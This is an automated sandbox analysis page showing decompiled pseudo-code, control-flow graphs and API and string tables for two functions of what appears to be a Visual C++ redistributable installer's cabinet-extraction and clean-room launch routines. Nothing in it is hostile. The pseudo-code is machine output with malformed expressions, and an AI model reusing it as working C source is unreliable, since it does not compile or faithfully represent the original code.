                                                                          Function 00030A77 Relevance: 56.3, APIs: 20, Strings: 12, Instructions: 288synchronizationCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 682 30a77-30a90 SetEvent 683 30a92-30ac5 call 137d3 682->683 684 30aca-30ad6 WaitForSingleObject 682->684 705 30e25-30e26 call 5012f 683->705 685 30b10-30b1b ResetEvent 684->685 686 30ad8-30b0b call 137d3 684->686 687 30b55-30b5b 685->687 688 30b1d-30b50 call 137d3 685->688 686->705 691 30b96-30baf call 121bc 687->691 692 30b5d-30b60 687->692 688->705 707 30bb1-30bc5 call 5012f 691->707 708 30bca-30bd5 SetEvent 691->708 697 30b62-30b87 call 137d3 call 5012f 692->697 698 30b8c-30b91 692->698 712 30e2b-30e2c 697->712 700 30e2d-30e2f 698->700 706 30e30-30e40 700->706 705->712 707->700 714 30c00-30c0c WaitForSingleObject 708->714 715 30bd7-30bf6 708->715 712->700 719 30c37-30c42 ResetEvent 714->719 720 30c0e-30c2d 714->720 715->714 721 30c44-30c63 719->721 722 30c6d-30c74 719->722 720->719 721->722 725 30ce3-30d05 CreateFileW 722->725 726 30c76-30c79 722->726 728 30d42-30d57 SetFilePointerEx 725->728 729 30d07-30d38 call 137d3 725->729 730 30ca0-30ca7 call 138d4 726->730 731 30c7b-30c7e 726->731 734 30d91-30d9c SetEndOfFile 728->734 735 30d59-30d8c call 137d3 728->735 729->728 737 30cac-30cb1 730->737 732 30c80-30c83 731->732 733 30c99-30c9b 731->733 732->698 741 30c89-30c8f 732->741 733->706 738 30dd3-30df0 SetFilePointerEx 734->738 739 30d9e-30dd1 call 137d3 734->739 735->705 742 30cb3-30ccd call 137d3 737->742 743 30cd2-30cde 737->743 738->700 744 30df2-30e20 call 137d3 738->744 739->705 741->733 742->705 743->700 744->705
                                                                          C-Code - Quality: 55%
                                                                          			E00030A77(void* __ecx, union _LARGE_INTEGER* __edx, intOrPtr _a4, union _LARGE_INTEGER* _a8) {
				union _LARGE_INTEGER* _v8;
				union _LARGE_INTEGER _v12;
				int _t30;
				void* _t34;
				intOrPtr _t42;
				void* _t50;
				signed short _t52;
				signed short _t56;
				signed short _t59;
				signed short _t62;
				void* _t66;
				intOrPtr _t68;
				void* _t72;
				signed short _t76;
				void* _t77;
				signed short _t79;
				void* _t80;
				signed short _t82;
				void* _t83;
				signed short _t86;
				signed short _t87;
				signed short _t88;
				signed int _t89;
				long _t90;
				signed int _t93;
				void* _t95;
				union _LARGE_INTEGER* _t98;
				intOrPtr _t100;
				signed int _t103;

				_t98 = __edx;
				_push(_t89);
				_t100 = _a4;
				_t30 = SetEvent( *(_t100 + 0x28));
				_t90 = _t89 | 0xffffffff;
				if(_t30 != 0) {
					if(WaitForSingleObject( *(_t100 + 0x24), _t90) != _t90) {
						if(ResetEvent( *(_t100 + 0x24)) != 0) {
							_t34 =  *((intOrPtr*)(_t100 + 0x2c)) - 1;
							if(_t34 == 0) {
								_t103 = E000121BC(_t98,  *((intOrPtr*)(_t100 + 0x34)), _a8->LowPart.HighPart, 0, 0xfde9);
								if(_t103 >= 0) {
									if(SetEvent( *(_t100 + 0x28)) != 0) {
										if(WaitForSingleObject( *(_t100 + 0x24), _t90) != _t90) {
											if(ResetEvent( *(_t100 + 0x24)) != 0) {
												_t42 =  *((intOrPtr*)(_t100 + 0x2c));
												if(_t42 == 0) {
													_t95 = CreateFileW( *(_t100 + 0x38), 0x40000000, 1, 0, 2, 0x80, 0);
													 *(_t100 + 0x3c) = _t95;
													if(_t95 != _t90) {
														_push(0);
														asm("cdq");
														if(SetFilePointerEx(_t95,  *_a8, _t98, 0) != 0) {
															if(SetEndOfFile( *(_t100 + 0x3c)) != 0) {
																_push(0);
																asm("xorps xmm0, xmm0");
																asm("movlpd [ebp-0x8], xmm0");
																if(SetFilePointerEx( *(_t100 + 0x3c), _v12, _v8, 0) == 0) {
																	_t52 = GetLastError();
																	_t107 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
																	_t103 =  >=  ? 0x80004005 :  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
																	E000137D3(0x80004005, "cabextract.cpp", 0x24f, _t103);
																	_push("Failed to set file pointer to beginning of file.");
																	goto L40;
																}
															} else {
																_t56 = GetLastError();
																_t110 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
																_t103 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
																E000137D3(0x80004005, "cabextract.cpp", 0x249, _t103);
																_push("Failed to set end of file.");
																goto L40;
															}
														} else {
															_t59 = GetLastError();
															_t113 =  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
															_t103 =  >=  ? 0x80004005 :  <=  ? _t59 : _t59 & 0x0000ffff | 0x80070000;
															E000137D3(0x80004005, "cabextract.cpp", 0x244, _t103);
															_push("Failed to set file pointer to end of file.");
															goto L40;
														}
													} else {
														_t62 = GetLastError();
														_t116 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
														_t103 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
														E000137D3(0x80004005, "cabextract.cpp", 0x23d, _t103);
														_push( *(_t100 + 0x38));
														_push("Failed to create file: %ls");
														goto L16;
													}
													goto L42;
												} else {
													_t66 = _t42 - 1;
													if(_t66 == 0) {
														_t68 = E000138D4( *_a8, 1); // executed
														 *((intOrPtr*)(_t100 + 0x40)) = _t68;
														if(_t68 != 0) {
															 *(_t100 + 0x48) =  *(_t100 + 0x48) & 0x00000000;
															 *(_t100 + 0x44) =  *_a8;
														} else {
															_t103 = 0x8007000e;
															E000137D3(_t68, "cabextract.cpp", 0x257, 0x8007000e);
															_push("Failed to allocate buffer for stream.");
															goto L40;
														}
														goto L42;
													} else {
														_t72 = _t66 - 1;
														if(_t72 == 0) {
															_t50 = 0;
														} else {
															_t73 = _t72 == 1;
															if(_t72 == 1) {
																goto L13;
															} else {
																_t93 = 0x8007139f;
																_push(0x8007139f);
																_push(0x268);
																goto L12;
															}
															goto L42;
														}
													}
												}
											} else {
												_t76 = GetLastError();
												_t119 =  <=  ? _t76 : _t76 & 0x0000ffff | 0x80070000;
												_t77 = 0x80004005;
												_t103 =  >=  ? 0x80004005 :  <=  ? _t76 : _t76 & 0x0000ffff | 0x80070000;
												_push(_t103);
												_push(0x232);
												goto L8;
											}
										} else {
											_t79 = GetLastError();
											_t122 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
											_t80 = 0x80004005;
											_t103 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
											_push(_t103);
											_push(0x22d);
											goto L5;
										}
									} else {
										_t82 = GetLastError();
										_t125 =  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
										_t83 = 0x80004005;
										_t103 =  >=  ? 0x80004005 :  <=  ? _t82 : _t82 & 0x0000ffff | 0x80070000;
										_push(_t103);
										_push(0x227);
										goto L2;
									}
								} else {
									_push(_a8->LowPart.HighPart);
									_push("Failed to copy stream name: %ls");
									L16:
									_push(_t103);
									E0005012F();
									goto L42;
								}
							} else {
								_t73 = _t34 == 4;
								if(_t34 == 4) {
									L13:
									_t103 = 0x80004004;
								} else {
									_t93 = 0x8007139f;
									_push(0x8007139f);
									_push(0x21d);
									L12:
									_t103 = _t93;
									E000137D3(_t73);
									E0005012F(_t93, "Invalid operation for this state.", "cabextract.cpp");
									_t90 = _t93 | 0xffffffff;
									goto L41;
								}
								goto L42;
							}
						} else {
							_t86 = GetLastError();
							_t128 =  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
							_t77 = 0x80004005;
							_t103 =  >=  ? 0x80004005 :  <=  ? _t86 : _t86 & 0x0000ffff | 0x80070000;
							_push(_t103);
							_push(0x20f);
							L8:
							_push("cabextract.cpp");
							E000137D3(_t77);
							_push("Failed to reset begin operation event.");
							goto L40;
						}
					} else {
						_t87 = GetLastError();
						_t131 =  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
						_t80 = 0x80004005;
						_t103 =  >=  ? 0x80004005 :  <=  ? _t87 : _t87 & 0x0000ffff | 0x80070000;
						_push(_t103);
						_push(0x20a);
						L5:
						_push("cabextract.cpp");
						E000137D3(_t80);
						_push("Failed to wait for begin operation event.");
						goto L40;
					}
				} else {
					_t88 = GetLastError();
					_t134 =  <=  ? _t88 : _t88 & 0x0000ffff | 0x80070000;
					_t83 = 0x80004005;
					_t103 =  >=  ? 0x80004005 :  <=  ? _t88 : _t88 & 0x0000ffff | 0x80070000;
					_push(_t103);
					_push(0x204);
					L2:
					_push("cabextract.cpp");
					E000137D3(_t83);
					_push("Failed to set operation complete event.");
					L40:
					_push(_t103);
					E0005012F();
					L41:
					L42:
					_t50 = 1;
				}
				 *(_t100 + 0x30) = _t103;
				_t91 =  >=  ? _t50 : _t90;
				_t51 =  >=  ? _t50 : _t90;
				return  >=  ? _t50 : _t90;
			}
































                                                                          0x00030a77
                                                                          0x00030a7c
                                                                          0x00030a7f
                                                                          0x00030a85
                                                                          0x00030a8b
                                                                          0x00030a90
                                                                          0x00030ad6
                                                                          0x00030b1b
                                                                          0x00030b58
                                                                          0x00030b5b
                                                                          0x00030bab
                                                                          0x00030baf
                                                                          0x00030bd5
                                                                          0x00030c0c
                                                                          0x00030c42
                                                                          0x00030c71
                                                                          0x00030c74
                                                                          0x00030cfe
                                                                          0x00030d00
                                                                          0x00030d05
                                                                          0x00030d45
                                                                          0x00030d4b
                                                                          0x00030d57
                                                                          0x00030d9c
                                                                          0x00030dd3
                                                                          0x00030dd7
                                                                          0x00030dda
                                                                          0x00030df0
                                                                          0x00030df2
                                                                          0x00030e03
                                                                          0x00030e0d
                                                                          0x00030e1b
                                                                          0x00030e20
                                                                          0x00000000
                                                                          0x00030e20
                                                                          0x00030d9e
                                                                          0x00030d9e
                                                                          0x00030daf
                                                                          0x00030db9
                                                                          0x00030dc7
                                                                          0x00030dcc
                                                                          0x00000000
                                                                          0x00030dcc
                                                                          0x00030d59
                                                                          0x00030d59
                                                                          0x00030d6a
                                                                          0x00030d74
                                                                          0x00030d82
                                                                          0x00030d87
                                                                          0x00000000
                                                                          0x00030d87
                                                                          0x00030d07
                                                                          0x00030d07
                                                                          0x00030d18
                                                                          0x00030d22
                                                                          0x00030d30
                                                                          0x00030d35
                                                                          0x00030d38
                                                                          0x00000000
                                                                          0x00030d38
                                                                          0x00000000
                                                                          0x00030c76
                                                                          0x00030c76
                                                                          0x00030c79
                                                                          0x00030ca7
                                                                          0x00030cac
                                                                          0x00030cb1
                                                                          0x00030cd7
                                                                          0x00030cdb
                                                                          0x00030cb3
                                                                          0x00030cb3
                                                                          0x00030cc3
                                                                          0x00030cc8
                                                                          0x00000000
                                                                          0x00030cc8
                                                                          0x00000000
                                                                          0x00030c7b
                                                                          0x00030c7b
                                                                          0x00030c7e
                                                                          0x00030c99
                                                                          0x00030c80
                                                                          0x00030c80
                                                                          0x00030c83
                                                                          0x00000000
                                                                          0x00030c89
                                                                          0x00030c89
                                                                          0x00030c8e
                                                                          0x00030c8f
                                                                          0x00000000
                                                                          0x00030c8f
                                                                          0x00000000
                                                                          0x00030c83
                                                                          0x00030c7e
                                                                          0x00030c79
                                                                          0x00030c44
                                                                          0x00030c44
                                                                          0x00030c55
                                                                          0x00030c58
                                                                          0x00030c5f
                                                                          0x00030c62
                                                                          0x00030c63
                                                                          0x00000000
                                                                          0x00030c63
                                                                          0x00030c0e
                                                                          0x00030c0e
                                                                          0x00030c1f
                                                                          0x00030c22
                                                                          0x00030c29
                                                                          0x00030c2c
                                                                          0x00030c2d
                                                                          0x00000000
                                                                          0x00030c2d
                                                                          0x00030bd7
                                                                          0x00030bd7
                                                                          0x00030be8
                                                                          0x00030beb
                                                                          0x00030bf2
                                                                          0x00030bf5
                                                                          0x00030bf6
                                                                          0x00000000
                                                                          0x00030bf6
                                                                          0x00030bb1
                                                                          0x00030bb4
                                                                          0x00030bb7
                                                                          0x00030bbc
                                                                          0x00030bbc
                                                                          0x00030bbd
                                                                          0x00000000
                                                                          0x00030bc2
                                                                          0x00030b5d
                                                                          0x00030b5d
                                                                          0x00030b60
                                                                          0x00030b8c
                                                                          0x00030b8c
                                                                          0x00030b62
                                                                          0x00030b62
                                                                          0x00030b67
                                                                          0x00030b68
                                                                          0x00030b6d
                                                                          0x00030b72
                                                                          0x00030b74
                                                                          0x00030b7f
                                                                          0x00030b84
                                                                          0x00000000
                                                                          0x00030b84
                                                                          0x00000000
                                                                          0x00030b60
                                                                          0x00030b1d
                                                                          0x00030b1d
                                                                          0x00030b2e
                                                                          0x00030b31
                                                                          0x00030b38
                                                                          0x00030b3b
                                                                          0x00030b3c
                                                                          0x00030b41
                                                                          0x00030b41
                                                                          0x00030b46
                                                                          0x00030b4b
                                                                          0x00000000
                                                                          0x00030b4b
                                                                          0x00030ad8
                                                                          0x00030ad8
                                                                          0x00030ae9
                                                                          0x00030aec
                                                                          0x00030af3
                                                                          0x00030af6
                                                                          0x00030af7
                                                                          0x00030afc
                                                                          0x00030afc
                                                                          0x00030b01
                                                                          0x00030b06
                                                                          0x00000000
                                                                          0x00030b06
                                                                          0x00030a92
                                                                          0x00030a92
                                                                          0x00030aa3
                                                                          0x00030aa6
                                                                          0x00030aad
                                                                          0x00030ab0
                                                                          0x00030ab1
                                                                          0x00030ab6
                                                                          0x00030ab6
                                                                          0x00030abb
                                                                          0x00030ac0
                                                                          0x00030e25
                                                                          0x00030e25
                                                                          0x00030e26
                                                                          0x00030e2b
                                                                          0x00030e2d
                                                                          0x00030e2f
                                                                          0x00030e2f
                                                                          0x00030e32
                                                                          0x00030e36
                                                                          0x00030e3a
                                                                          0x00030e40

                                                                          APIs
                                                                          • SetEvent.KERNEL32(?,?,?,?,00000000,00000000,?,00030621,?,?), ref: 00030A85
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,00030621,?,?), ref: 00030A92
                                                                          • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000000,00000000,?,00030621,?,?), ref: 00030ACE
                                                                          • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,?,00030621,?,?), ref: 00030AD8
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$EventObjectSingleWait
                                                                          • String ID: @Met$Failed to allocate buffer for stream.$Failed to copy stream name: %ls$Failed to create file: %ls$Failed to reset begin operation event.$Failed to set end of file.$Failed to set file pointer to beginning of file.$Failed to set file pointer to end of file.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                          • API String ID: 3600396749-3765615505
                                                                          • Opcode ID: af674713f419af4e9ab1f3b54fb72663fa3693d88da9b49e7b4dbef5a80c3c35
                                                                          • Instruction ID: 9c01ef751aa096da112c902f983e3fc65abfa823af57651f2e838a2728513cbd
                                                                          • Opcode Fuzzy Hash: af674713f419af4e9ab1f3b54fb72663fa3693d88da9b49e7b4dbef5a80c3c35
                                                                          • Instruction Fuzzy Hash: 56913472B41722BBF7216AB98D09BA775DDEF04751F010221FE05FA5E0D765DC008AE1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00014C33 Relevance: 40.5, APIs: 6, Strings: 17, Instructions: 219COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1141 14c33-14c7b call 3f670 call 133d7 1146 14c7d-14c8a call 5012f 1141->1146 1147 14c8f-14c99 call 296f2 1141->1147 1152 14e2b-14e35 1146->1152 1153 14ca2-14cb1 call 296f8 1147->1153 1154 14c9b-14ca0 1147->1154 1155 14e40-14e44 1152->1155 1156 14e37-14e3c CloseHandle 1152->1156 1162 14cb6-14cba 1153->1162 1157 14cd7-14cf2 call 11f20 1154->1157 1160 14e46-14e4b CloseHandle 1155->1160 1161 14e4f-14e53 1155->1161 1156->1155 1168 14cf4-14cf9 1157->1168 1169 14cfb-14d0f call 26859 1157->1169 1160->1161 1164 14e55-14e5a CloseHandle 1161->1164 1165 14e5e-14e60 1161->1165 1166 14cd1-14cd4 1162->1166 1167 14cbc 1162->1167 1164->1165 1170 14e62-14e63 CloseHandle 1165->1170 1171 14e65-14e79 call 12793 * 2 1165->1171 1166->1157 1172 14cc1-14ccc call 5012f 1167->1172 1168->1172 1179 14d11 1169->1179 1180 14d29-14d3d call 26915 1169->1180 1170->1171 1185 14e83-14e87 1171->1185 1186 14e7b-14e7e call 554ef 1171->1186 1172->1152 1182 14d16 1179->1182 1193 14d46-14d61 call 11f62 1180->1193 1194 14d3f-14d44 1180->1194 1187 14d1b-14d24 call 5012f 1182->1187 1190 14e91-14e99 1185->1190 1191 14e89-14e8c call 554ef 1185->1191 1186->1185 1199 14e28 1187->1199 1191->1190 1200 14d63-14d68 1193->1200 1201 14d6d-14d86 call 11f62 1193->1201 1194->1182 1199->1152 1200->1172 1204 14d92-14dbe CreateProcessW 1201->1204 1205 14d88-14d8d 1201->1205 1206 14dc0-14df6 call 137d3 1204->1206 1207 14dfb-14e11 call 50917 1204->1207 1205->1172 1206->1187 1210 14e16-14e1a 1207->1210 1210->1152 1211 14e1c-14e23 call 5012f 1210->1211 1211->1199
                                                                          C-Code - Quality: 58%
                                                                          			E00014C33(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				struct _SECURITY_ATTRIBUTES* _v8;
				char _v12;
				struct _SECURITY_ATTRIBUTES* _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				struct _SECURITY_ATTRIBUTES* _v28;
				struct _SECURITY_ATTRIBUTES* _v32;
				struct _PROCESS_INFORMATION _v48;
				struct _STARTUPINFOW _v116;
				void* __edi;
				void* _t66;
				void* _t70;
				WCHAR* _t71;
				void* _t73;
				void* _t76;
				void* _t79;
				int _t87;
				void* _t90;
				signed short _t101;
				void* _t107;
				intOrPtr _t108;
				void* _t109;
				void* _t114;
				void* _t115;
				WCHAR* _t117;
				void* _t120;
				void* _t125;
				void* _t130;
				void* _t131;
				void* _t132;
				void* _t133;

				_t114 = __edx;
				_v16 = 0;
				_v32 = 0;
				_v12 = 0;
				_v28 = 0;
				E0003F670(_t115,  &_v116, 0, 0x44);
				_v24 = 0;
				_v20 = 0;
				asm("stosd");
				_t131 = _t130 + 0xc;
				_t107 = 0;
				_v8 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t120 = E000133D7( &_v16, 0);
				if(_t120 >= 0) {
					_t66 = E000296F2();
					_t108 = _a8;
					if(_t66 == 0) {
						_t70 = E000296F8(_t109, _t114, _t108 + 0xbc, _t108 + 0x48,  &_v32); // executed
						if(_t70 >= 0) {
							_t117 = _v32;
							_t71 = _v16;
							goto L8;
						} else {
							_push("Failed to cache to clean room.");
							goto L6;
						}
					} else {
						_t71 = _v16;
						_t117 = _t71;
						L8:
						_push(_t71);
						_t73 = E00011F20( &_v12, L"-%ls=\"%ls\"", L"burn.clean.room");
						_t132 = _t131 + 0x10;
						if(_t73 >= 0) {
							_t76 = E00026859(_t109,  *((intOrPtr*)(_t108 + 0x48)),  &_v24,  &_v12); // executed
							if(_t76 >= 0) {
								_t79 = E00026915(_t117,  &_v20,  &_v12, 0); // executed
								if(_t79 >= 0) {
									_push(_a4);
									_t125 = E00011F62( &_v12, L"%ls %ls", _v12);
									_t133 = _t132 + 0x10;
									if(_t125 >= 0) {
										_push(_v12);
										_t125 = E00011F62( &_v28, L"\"%ls\" %ls", _t117);
										_t132 = _t133 + 0x10;
										if(_t125 >= 0) {
											_v116.wShowWindow =  *((intOrPtr*)(_t108 + 0x2c));
											_v116.cb = 0x44;
											_t87 = CreateProcessW(_t117, _v28, 0, 0, 1, 0, 0, 0,  &_v116,  &_v48); // executed
											if(_t87 != 0) {
												_v8 = _v48.hProcess;
												_t107 = _v8;
												_v48.hProcess = 0;
												_t90 = E00050917(_t109, _t107, 0xffffffff, _t108 + 0xf8); // executed
												_t125 = _t90;
												if(_t125 < 0) {
													E0005012F(_t125, "Failed to wait for clean room process: %ls", _t117);
													goto L24;
												}
											} else {
												_t101 = GetLastError();
												_t129 =  <=  ? _t101 : _t101 & 0x0000ffff | 0x80070000;
												_t125 =  >=  ? 0x80004005 :  <=  ? _t101 : _t101 & 0x0000ffff | 0x80070000;
												E000137D3(0x80004005, "engine.cpp", 0x1ce, _t125);
												_push(_v28);
												_push("Failed to launch clean room process: %ls");
												goto L13;
											}
										} else {
											_push("Failed to allocate full command-line.");
											goto L6;
										}
									} else {
										_push("Failed to append original command line.");
										goto L6;
									}
								} else {
									_push(L"burn.filehandle.self");
									goto L12;
								}
							} else {
								_push(L"burn.filehandle.attached");
								L12:
								_push("Failed to append %ls");
								L13:
								_push(_t125);
								E0005012F();
								_t107 = _v8;
								L24:
							}
						} else {
							_push("Failed to allocate parameters for unelevated process.");
							L6:
							_push(_t125);
							E0005012F();
							_t107 = _v8;
						}
					}
				} else {
					_push("Failed to get path for current process.");
					_push(_t120);
					E0005012F();
				}
				if(_v48.hThread != 0) {
					CloseHandle(_v48.hThread);
					_v48.hThread = _v48.hThread & 0x00000000;
				}
				if(_v20 != 0xffffffff) {
					CloseHandle(_v20);
					_v20 = _v20 | 0xffffffff;
				}
				if(_v24 != 0xffffffff) {
					CloseHandle(_v24);
					_v24 = _v24 | 0xffffffff;
				}
				if(_t107 != 0) {
					CloseHandle(_t107);
				}
				E00012793(_v28);
				E00012793(_v12);
				if(_v32 != 0) {
					E000554EF(_v32);
				}
				if(_v16 != 0) {
					E000554EF(_v16);
				}
				return _t125;
			}


































                                                                          0x00014c33
                                                                          0x00014c45
                                                                          0x00014c48
                                                                          0x00014c4b
                                                                          0x00014c4e
                                                                          0x00014c51
                                                                          0x00014c58
                                                                          0x00014c5e
                                                                          0x00014c61
                                                                          0x00014c62
                                                                          0x00014c65
                                                                          0x00014c67
                                                                          0x00014c6a
                                                                          0x00014c6c
                                                                          0x00014c6d
                                                                          0x00014c77
                                                                          0x00014c7b
                                                                          0x00014c8f
                                                                          0x00014c94
                                                                          0x00014c99
                                                                          0x00014cb1
                                                                          0x00014cba
                                                                          0x00014cd1
                                                                          0x00014cd4
                                                                          0x00000000
                                                                          0x00014cbc
                                                                          0x00014cbc
                                                                          0x00000000
                                                                          0x00014cbc
                                                                          0x00014c9b
                                                                          0x00014c9b
                                                                          0x00014c9e
                                                                          0x00014cd7
                                                                          0x00014cd7
                                                                          0x00014ce6
                                                                          0x00014ced
                                                                          0x00014cf2
                                                                          0x00014d06
                                                                          0x00014d0f
                                                                          0x00014d34
                                                                          0x00014d3d
                                                                          0x00014d46
                                                                          0x00014d5a
                                                                          0x00014d5c
                                                                          0x00014d61
                                                                          0x00014d6d
                                                                          0x00014d7f
                                                                          0x00014d81
                                                                          0x00014d86
                                                                          0x00014d98
                                                                          0x00014da3
                                                                          0x00014db6
                                                                          0x00014dbe
                                                                          0x00014dfe
                                                                          0x00014e07
                                                                          0x00014e0e
                                                                          0x00014e11
                                                                          0x00014e16
                                                                          0x00014e1a
                                                                          0x00014e23
                                                                          0x00000000
                                                                          0x00014e23
                                                                          0x00014dc0
                                                                          0x00014dc0
                                                                          0x00014dd1
                                                                          0x00014ddb
                                                                          0x00014de9
                                                                          0x00014dee
                                                                          0x00014df1
                                                                          0x00000000
                                                                          0x00014df1
                                                                          0x00014d88
                                                                          0x00014d88
                                                                          0x00000000
                                                                          0x00014d88
                                                                          0x00014d63
                                                                          0x00014d63
                                                                          0x00000000
                                                                          0x00014d63
                                                                          0x00014d3f
                                                                          0x00014d3f
                                                                          0x00000000
                                                                          0x00014d3f
                                                                          0x00014d11
                                                                          0x00014d11
                                                                          0x00014d16
                                                                          0x00014d16
                                                                          0x00014d1b
                                                                          0x00014d1b
                                                                          0x00014d1c
                                                                          0x00014d21
                                                                          0x00014e28
                                                                          0x00014e28
                                                                          0x00014cf4
                                                                          0x00014cf4
                                                                          0x00014cc1
                                                                          0x00014cc1
                                                                          0x00014cc2
                                                                          0x00014cc7
                                                                          0x00014ccb
                                                                          0x00014cf2
                                                                          0x00014c7d
                                                                          0x00014c7d
                                                                          0x00014c82
                                                                          0x00014c83
                                                                          0x00014c89
                                                                          0x00014e35
                                                                          0x00014e3a
                                                                          0x00014e3c
                                                                          0x00014e3c
                                                                          0x00014e44
                                                                          0x00014e49
                                                                          0x00014e4b
                                                                          0x00014e4b
                                                                          0x00014e53
                                                                          0x00014e58
                                                                          0x00014e5a
                                                                          0x00014e5a
                                                                          0x00014e60
                                                                          0x00014e63
                                                                          0x00014e63
                                                                          0x00014e68
                                                                          0x00014e70
                                                                          0x00014e79
                                                                          0x00014e7e
                                                                          0x00014e7e
                                                                          0x00014e87
                                                                          0x00014e8c
                                                                          0x00014e8c
                                                                          0x00014e99

                                                                          APIs
                                                                            • Part of subcall function 000133D7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,000110DD,?,00000000), ref: 000133F8
                                                                          • CloseHandle.KERNEL32(00000000,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00014E3A
                                                                          • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00014E49
                                                                          • CloseHandle.KERNEL32(000000FF,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00014E58
                                                                          • CloseHandle.KERNEL32(?,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 00014E63
                                                                          Strings
                                                                          • %ls %ls, xrefs: 00014D4F
                                                                          • user.cpp, xrefs: 00014DE4
                                                                          • burn.filehandle.self, xrefs: 00014D3F
                                                                          • Failed to cache to clean room., xrefs: 00014CBC
                                                                          • D, xrefs: 00014DA3
                                                                          • Failed to append %ls, xrefs: 00014D16
                                                                          • Failed to append original command line., xrefs: 00014D63
                                                                          • Failed to wait for clean room process: %ls, xrefs: 00014E1D
                                                                          • -%ls="%ls", xrefs: 00014CE0
                                                                          • Failed to allocate parameters for unelevated process., xrefs: 00014CF4
                                                                          • burn.filehandle.attached, xrefs: 00014D11
                                                                          • Failed to allocate full command-line., xrefs: 00014D88
                                                                          • Failed to get path for current process., xrefs: 00014C7D
                                                                          • burn.clean.room, xrefs: 00014CD8
                                                                          • "%ls" %ls, xrefs: 00014D74
                                                                          • Failed to launch clean room process: %ls, xrefs: 00014DF1
                                                                          • @Met, xrefs: 00014DC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: CloseHandle$FileModuleName
                                                                          • String ID: "%ls" %ls$%ls %ls$-%ls="%ls"$@Met$D$Failed to allocate full command-line.$Failed to allocate parameters for unelevated process.$Failed to append %ls$Failed to append original command line.$Failed to cache to clean room.$Failed to get path for current process.$Failed to launch clean room process: %ls$Failed to wait for clean room process: %ls$burn.clean.room$burn.filehandle.attached$burn.filehandle.self$user.cpp
                                                                          • API String ID: 3884789274-88123116
                                                                          • Opcode ID: 0ae78698e3a9ba8a13d0e2e38f79432df5655c7942994deadf39c20cec84a054
                                                                          • Instruction ID: e08bfd0c0ede1ab8fecd07f4b05487a6a8ed6816ab0317fd430b9bf4217afb0a
                                                                          • Opcode Fuzzy Hash: 0ae78698e3a9ba8a13d0e2e38f79432df5655c7942994deadf39c20cec84a054
                                                                          • Instruction Fuzzy Hash: 34718631D00229ABDF219BA4CC41DEFBBBCAF04711F114165FE14BB1A1D7745A858BD1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000284C4 Relevance: 37.0, APIs: 9, Strings: 12, Instructions: 205fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
